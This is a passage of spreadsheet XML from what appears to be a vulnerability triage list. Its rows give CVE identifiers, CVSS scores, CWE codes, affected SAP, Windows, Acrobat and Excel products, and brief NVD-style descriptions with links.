      <c r="E892" s="5" t="inlineStr"/>
      <c r="F892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G892" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H892" s="5" t="inlineStr"/>
      <c r="I892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L892" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Business Client does not perform sufficient validation when processing certain locally stored data during application startup. An attacker with low privileges on the local system could replace this data with specially crafted content. When the application is next launched, the crafted content is processed and could lead to arbitrary code execution in the context of the user. This results in a high impact on confidentiality, integrity and availability of the application.</t>
        </is>
      </c>
      <c r="M892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="C893" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E893" s="5" t="inlineStr"/>
      <c r="F893" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G893" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H893" s="5" t="inlineStr"/>
      <c r="I893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L893" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="C894" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E894" s="5" t="inlineStr"/>
      <c r="F894" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G894" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H894" s="5" t="inlineStr"/>
      <c r="I894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L894" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="C895" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E895" s="5" t="inlineStr"/>
      <c r="F895" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G895" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H89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95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L895" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="C896" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E896" s="5" t="inlineStr"/>
      <c r="F896" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G896" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H896" s="5" t="inlineStr"/>
      <c r="I896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L896" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="C897" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E897" s="5" t="inlineStr"/>
      <c r="F897" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G897" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H89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897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L897" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="C898" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E898" s="5" t="inlineStr"/>
      <c r="F898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G898" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H89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898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="C899" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E899" s="5" t="inlineStr"/>
      <c r="F899" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G899" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H899" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="C900" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E900" s="5" t="inlineStr"/>
      <c r="F900" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G900" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H900" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="C901" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E901" s="5" t="inlineStr"/>
      <c r="F901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G901" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H901" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L901" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="C902" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E902" s="5" t="inlineStr"/>
      <c r="F902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G902" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H902" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L902" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="C903" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E903" s="5" t="inlineStr"/>
      <c r="F903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G903" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H903" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L903" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="C904" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E904" s="5" t="inlineStr"/>
      <c r="F904" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G904" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H904" s="5" t="inlineStr"/>
      <c r="I904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="C905" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G905" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H905" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L905" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="C906" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G906" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H906" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L906" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="C907" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G907" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H907" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="L907" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="C908" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G908" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H908" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L908" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="C909" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G909" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H909" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L909" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="C910" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G910" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H910" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L910" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="C911" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G911" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H911" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L911" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="C912" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G912" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H912" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I912" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L912" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="C913" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G913" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H913" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L913" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="C914" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G914" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H914" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
